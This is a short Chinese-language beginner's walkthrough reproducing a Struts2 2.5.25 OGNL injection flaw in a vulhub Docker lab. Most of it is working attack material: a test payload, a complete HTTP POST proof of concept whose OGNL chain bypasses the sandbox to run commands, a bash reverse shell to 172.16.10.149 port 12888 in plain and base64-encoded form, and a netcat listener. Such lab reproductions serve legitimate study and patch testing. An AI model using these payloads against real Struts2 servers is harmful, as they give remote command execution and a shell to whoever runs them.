漏洞环境
执行如下命令启动一个Struts2 2.5.25版本环境:
这里我的环境是vulhub
docker-compose up -d
环境启动后,访问http://your-ip:8080/index.action查看到首页
漏洞复现
1、测试漏洞是否存在
Payload:/?id=%25%7b+%27test%27+%2b+(2021+%2b+20).toString()%7d,发现执行了(2021+20)的命令,通过F12工具查看执行成功:
2、RCE
poc如下
POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 829
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
打开抓包
这边可以看到id成功执行
3、反弹shell
Payload:bash -i >& /dev/tcp/172.16.10.149/12888 0>&1
先对bash反弹命令进行编码
构造base反弹的shell
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTQ5LzEyODg4IDA+JjE=}|{base64,-d}|{bash,-i}
监听机起监听
nc -lvvnp 12888
用自己的payload来替换POC中的payload,通过burp来执行POC
burp没有回显 我们看一下监听机 监听机成功反弹shell
小记一下初学者的复现